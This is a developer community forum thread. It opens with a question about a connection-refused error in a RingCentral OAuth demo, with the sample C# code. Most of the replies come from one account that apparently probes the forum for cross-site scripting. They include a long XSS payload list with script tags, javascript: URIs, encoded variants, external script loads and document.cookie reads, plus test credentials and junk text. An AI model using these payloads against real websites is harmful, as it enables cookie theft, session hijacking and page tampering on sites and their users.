Skip to main content
To homepage To homepage
Question

Auth Flow ERR_CONNECTION_REFUSED on localhost

  • April 8, 2020
  • 14 replies
  • 1199 views
J

Hi. I am trying to run the Authorization Flow demo.

After I enter my username and password, I get a connection refused error. The uri in the browser looks like the following:

http://localhost:5000/oauth2callback?code=U0pDMTFQM

with a long string for code.


Any hints as to where to go next?

14 replies

PhongVu
Community Manager
Forum|alt.badge.img
  • PhongVu
  • Community Manager
  • April 8, 2020

Can you show how you implement your code? Take out sensitive information such as you app client id, secret etc.

J

I just copied the C# example from the ringcentral site. The only thing I changed was the Client ID and Secret:


using System.Linq;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.AspNetCore.Http;
using Microsoft.Extensions.DependencyInjection;
using RingCentral;
using Newtonsoft.Json;
using Microsoft.Extensions.Hosting;

namespace RCAuthFlowV2
{
public class Startup
{
private const string RINGCENTRAL_CLIENT_ID = "XXXXXXXXXX";
private const string RINGCENTRAL_CLIENT_SECRET = "YYYYYYYYYYYYYYYYYYY";
private const string RINGCENTRAL_SERVER_URL = "https://platform.devtest.ringcentral.com";
private const string RINGCENTRAL_REDIRECT_URL = "http://localhost:5000/oauth2callback";
private const string SESSION_TOKEN_KEY = "rc-token";

public void ConfigureServices(IServiceCollection services)
{
services.AddMvc().AddSessionStateTempDataProvider();
services.AddSession();
}

private static string Html(string body)
{
return $@"<!doctype html><html><body>{body}</body></html>";
}

public void Configure(IApplicationBuilder app, IWebHostEnvironment env)
{
if (env.IsDevelopment()) app.UseDeveloperExceptionPage();
app.UseSession();
app.Run(async (context) =>
{
var rc = new RestClient(RINGCENTRAL_CLIENT_ID, RINGCENTRAL_CLIENT_SECRET, RINGCENTRAL_SERVER_URL);
var tokenString = context.Session.GetString(SESSION_TOKEN_KEY);
if (tokenString != null)
{
rc.token = JsonConvert.DeserializeObject<TokenInfo>(tokenString);
}
else if (context.Request.Path != "/oauth2callback")
{
var oauthUri = rc.AuthorizeUri(RINGCENTRAL_REDIRECT_URL);
await context.Response.WriteAsync(
Html($"<h2>RingCentral Authorization Code Flow Authentication</h2><a href="{oauthUri}">Login RingCentral Account</a>"));
return;
}

switch (context.Request.Path)
{
case "/":
await context.Response.WriteAsync(Html(@"<b><a href=""/logout"">Logout</a></b>
<h2>Call APIs</h2>
<ul>
<li><a href=""/test?api=extension"" target=""_blank"">Read Extension Info</a></li>
<li><a href=""/test?api=extension-call-log"" target=""_blank"">Read Extension Call Log</a></li>
<li><a href=""/test?api=account-call-log"" target=""_blank"">Read Account Call Log</a></li>
</ul>"));
break;
case "/oauth2callback":
context.Request.Query.TryGetValue("code", out var codes);
var code = codes.First();
await rc.Authorize(code, RINGCENTRAL_REDIRECT_URL);
context.Session.SetString(SESSION_TOKEN_KEY, JsonConvert.SerializeObject(rc.token));
context.Response.Redirect("/");
break;
case "/test":
context.Request.Query.TryGetValue("api", out var apis);
var api = apis.First();
var result = "";
switch (api)
{
case "extension":
result = await rc.Get<string>("/restapi/v1.0/account/~/extension");
break;
case "extension-call-log":
result = await rc.Get<string>("/restapi/v1.0/account/~/extension/~/call-log");
break;
case "account-call-log":
result = await rc.Get<string>("/restapi/v1.0/account/~/call-log");
break;
}

await context.Response.WriteAsync(Html($"<pre>{result}</pre>"));
break;
case "/logout":
await rc.Revoke();
context.Session.Remove(SESSION_TOKEN_KEY);
context.Response.Redirect("/");
break;
default:
context.Response.StatusCode = 404;
break;
}
});
}
}
}


A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

ss

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020
"/><script>alert(1)</script>
A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js"> < <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

'-alert(document.domain)-'&did='-alert(document.domain)-'. [5:21%11PM,%202/29/2020]%joker:%20 javascript:alert("hellox worldss") <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> PT SRC="http://ha.ckers.org/xss.js"> < <"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 &search=1 0&q=';alert(String.fromCharCode(88,83,83))//';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//";alert(String.fromCharCode(88,83,83)%?29//-->">'>&submit-frmGoogleWeb=Web+Search

hellox worldss






...




lol "> "> "> "> <% foo>

LOL LOL <SCRIPT>alert(/XSS/.source)</SCRIPT> ";alert('XSS');// </TITLE><SCRIPT>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <XSS STYLE="behavior: url(xss.htc);"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> <IMG SRC="mocha:[code]"> <IMG SRC="livescript:[code]"> žscriptualert(EXSSE)ž/scriptu <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');" <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:07507206C028'06a06107606107306307206907007403a06106c065072074028.1027058.1053053027029'029"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@import'javasc ipt:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='noxss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> <!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]--> <BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]> </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML> <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> <? echo('<SCR)'; echo('IPT>alert("XSS")</SCRIPT>'); ?> <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="htt p://6 6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://ha.ckers.org@google">XSS</A> <A HREF="http://google:ha.ckers.org">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> < %3C < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < x3c x3C u003c u003C <iframe src=http://ha.ckers.org/scriptlet.html> <IMG SRC="javascript:alert('XSS')" <SCRIPT SRC=//ha.ckers.org/.js> <SCRIPT SRC=http://ha.ckers.org/xss.js?<B> <<SCRIPT>alert("XSS");//<</SCRIPT> <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> <BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")> <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> <IMG SRC=" javascript:alert('XSS');"> perl -e 'print "<SCRIPT>alert("XSS")</SCRIPT>";' > out perl -e 'print "<IMG SRC=javascript:alert("XSS")>";' > out <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG SRC=javascript:alert("XSS")> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <IMG SRC="javascript:alert('XSS');"> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> '';!--"<XSS>=&{()} ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'> '';!--"=&{()} "> < ";alert('XSS');// ¼script¾alert(¢XSS¢)¼/script¾
exp/* a="get";b="URL(ja"";c="vascr";d="ipt:ale";e="rt('XSS');")";eval(a+b+c+d+e); PT SRC="http://ha.ckers.org/xss.js"> TESTHTML5FORMACTION crosssitespt "> "> "> ;1 +ADw-script+AD4-alert(document.location)+ADw-/script+AD4- %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- %253cscript%253ealert(document.cookie)%253c/script%253e “>alert(document.cookie) “> “>< foo %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E ‘; alert(document.cookie); var foo=’ foo’; alert(document.cookie);//’; "> ]> &file; 40404 123 a username: csrf_test password: Qwer@123
A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

ddddddddddddddddddddddddddddddddddd

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

<"';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

">

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

sdfsdfsfsdfs

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

">')" />

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

fffffffffffffffffffffffffffffffffffffffffffffff

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

cccccccccccccccccccccccccc

A
  • arjun2500424015
  • Participating Frequently
  • April 9, 2020

xxxxxxxxxxxxxxxx

Terms & ConditionsCookie settingsAccessibility statement
PRODUCTS
RingEX
Message
Video
Phone
OPEN ECOSYSTEM
Developer Platform
APIs
Integrated Apps
App Gallery
Developer support
Games and rewards

RESOURCES
Resource center
Blog
Product Releases
Accessibility
QUICK LINKS
App Download
RingCentral App login
Admin Portal Login
Contact Sales
© 1999-2024 RingCentral, Inc. All rights reserved. Privacy Notice